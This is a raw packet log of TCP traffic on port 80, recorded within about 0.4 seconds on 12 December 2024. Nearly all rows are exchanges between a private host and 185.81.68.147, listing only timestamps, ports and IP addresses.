Dec 12, 2024 16:48:44.440449953 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.440598965 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.440618038 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.440624952 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.440670013 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.441595078 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.441745996 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.441864014 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.442661047 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.443022013 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.443643093 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.443702936 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.443718910 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.443783045 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.444613934 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.444916010 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.445027113 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.445712090 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.445723057 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.445836067 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.446675062 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.446774960 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.446886063 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.447683096 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.447858095 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.447994947 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.448693037 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.448942900 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.449067116 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.449712038 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.450748920 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.450754881 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.450766087 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.450881958 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.451738119 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.451886892 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.452059984 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.452799082 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.453829050 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.453835964 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.453846931 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.453970909 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.454790115 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.455585957 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.455912113 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.455977917 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.455988884 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.456886053 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.456892014 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.456940889 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.458117962 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.458952904 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.458957911 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.458969116 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.459074974 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.459907055 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.460925102 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.460931063 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.460968971 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.461071014 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.461127996 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.461914062 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.462090969 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.462225914 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.462960005 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.463093996 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.463224888 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.463952065 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.464066982 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.464174032 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.464952946 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.465754986 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.465863943 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.465996027 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.466002941 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.466099977 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.466964960 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.467154980 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.467261076 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.468049049 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.468241930 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.468377113 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.469011068 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.469135046 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.469244003 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.470010042 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.470094919 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.470199108 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.471046925 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.471090078 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.471195936 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.472148895 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.473048925 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.473134041 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.473144054 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.473249912 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.474066019 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.474220991 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.474441051 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.475116968 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.475122929 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.475224972 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.476099014 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.477130890 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.477137089 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.477206945 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.477248907 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.477271080 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.478189945 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.478195906 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.478302002 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.479202986 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.479260921 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.479397058 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.480155945 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.480576992 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.480714083 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.481195927 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.481678009 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.482243061 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.482251883 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.482355118 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.483294010 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.483304024 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.483427048 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.484196901 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.484939098 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.485095978 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.485270977 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.485698938 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.485826969 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.486314058 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.486901045 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.487085104 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.487237930 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.487442970 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.487715006 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.488389015 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.488573074 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.488701105 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.489439964 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.489531040 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.489656925 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.490313053 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.490622044 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.491348982 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.491451025 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.491905928 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.492346048 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.492474079 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.492974997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.493177891 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.493323088 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.539469957 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:44.540971041 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.632512093 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.632586002 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.632770061 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.632937908 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.633172989 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.633286953 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.633924961 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.634052038 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.634306908 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.634978056 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.635827065 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.636019945 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.636034012 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.636132002 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.636997938 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.638091087 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.638102055 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.638113976 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.638222933 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.639060020 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.639169931 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.639277935 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.640032053 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.640218019 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.640494108 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.641105890 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.641113043 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.641463041 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.642076969 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.642404079 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.642513990 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.643126011 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.643481016 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.643764973 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.644201040 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.644465923 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.644617081 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.645168066 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.645423889 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.645620108 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.646181107 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.646640062 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.646778107 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.647214890 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.647222042 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.647331953 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.648354053 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.648627996 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.648813009 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.649264097 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.649270058 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.649373055 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.650185108 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.650299072 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.650437117 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.651194096 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.651541948 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.651720047 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.652204990 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.652363062 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.652510881 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.653220892 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.653958082 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.654275894 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.654280901 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.654280901 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.654329062 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.655394077 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.655756950 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.655956984 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.656260014 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.656691074 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.657291889 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.657392025 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.657475948 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.658292055 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.658413887 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.658900023 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.659419060 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.659545898 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.660123110 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.660479069 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.660603046 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.660774946 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.661344051 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.661364079 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.661601067 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.661936045 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.662369967 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.662550926 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.662659883 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.663496971 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.663502932 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.663614035 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.664441109 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.664623022 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.665066957 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.665401936 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.665740013 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.665837049 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.666459084 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.666476011 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.666532040 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.667424917 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.667927027 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.668723106 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.668795109 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.668896914 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.669462919 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.669543028 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.669640064 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.670492887 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.670623064 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.670789003 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.671524048 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.671921015 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.672511101 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.672635078 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.672663927 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.672688007 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.673804045 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.673906088 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.674009085 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.674556017 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.674788952 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.674886942 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.675596952 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.675606966 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.675708055 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.676599979 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.677510977 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.677634001 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.677647114 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.677741051 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.678674936 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.678817034 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.678925991 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.679657936 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.679749966 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.679879904 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.680636883 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.681668043 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.681678057 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.681696892 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.681777954 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.681799889 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.682713985 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.682789087 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.682909966 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.683693886 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.683932066 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.684217930 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.684708118 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.685518026 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.685630083 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.685931921 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.728555918 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.824965000 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.825037003 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.825184107 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.825349092 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.825361013 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.825404882 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.826364040 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.826719046 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.826833963 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.826880932 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.827852964 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.827864885 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.827912092 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.828761101 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.828772068 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.828810930 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.829746962 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.830318928 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.830368042 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.830841064 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.830940962 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.830986977 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.831859112 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.831871033 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.831911087 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.832776070 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.832817078 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.833823919 CET	80	49946	185.81.68.147	192.168.2.10
